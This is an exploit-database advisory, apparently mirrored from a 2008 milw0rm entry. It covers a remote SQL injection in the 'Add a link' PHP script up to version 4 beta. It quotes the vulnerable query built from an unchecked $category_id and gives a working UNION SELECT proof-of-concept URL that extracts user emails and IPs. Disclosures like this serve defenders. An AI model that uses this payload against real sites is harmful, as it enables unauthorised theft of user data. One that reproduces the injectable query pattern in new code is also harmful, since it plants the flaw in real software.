Add a link - exploit.company

vendor:

Add a link

by:

ka0x

7.5

CVSS

HIGH

Remote SQL Injection

CWE

Product Name: Add a link

Affected Version From: <= 4 - beta

Affected Version To: <= 4 - beta

Patch Exists: YES

Related CWE: N/A

CPE: a:add_a_link:add_a_link

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Add a link <= 4 - beta || Remote SQL Injection Vulnerability

The Add a link script version <= 4 - beta is vulnerable to a remote SQL injection vulnerability. The var $category_id isn't verified, allowing an attacker to inject arbitrary SQL queries. This can be exploited to read out sensitive information from the database, such as user credentials.

Mitigation:

Input validation should be used to ensure that user-supplied data is not used to construct SQL queries in a way that would allow an attacker to access or modify data.

Source

Exploit-DB raw data:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Add a link <= 4 - beta || Remote SQL Injection Vulnerability
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

/ Script: Add a link
/ Version: <= 4 - beta
/ File affected: user_read_links.php
/ Download: http://sourceforge.net/projects/addalink/
/ need magic_quotes_gpc = Off


Found by ka0x <ka0x01 [at] gmail [dot] com>
D.O.M Labs - Security Researchers
- www.domlabs.org


Vuln Code:
--------------

32:  $read_out_linktable="SELECT * FROM $linktable WHERE approved='1' AND category_id='$category_id' ORDER BY id DESC LIMIT $start,$steps";
33:  $read_result=mysql_query($read_out_linktable);

....

87:  while($data=mysql_fetch_array($read_result))
88:  {
90:      echo "<tr><td colspan=\"5\">$data[description]</td></tr>";
91:  }

--------------

The var $category_id isn't verified.


Proof of Concept:

http://[host]/[addalink-path]/user_read_links.php?category_id=' UNION SELECT 1,1,1,1,1,1,concat(email,0x3a,ip),1,1,1,1 FROM Linklisttable/*


__EOF__

# milw0rm.com [2008-09-18]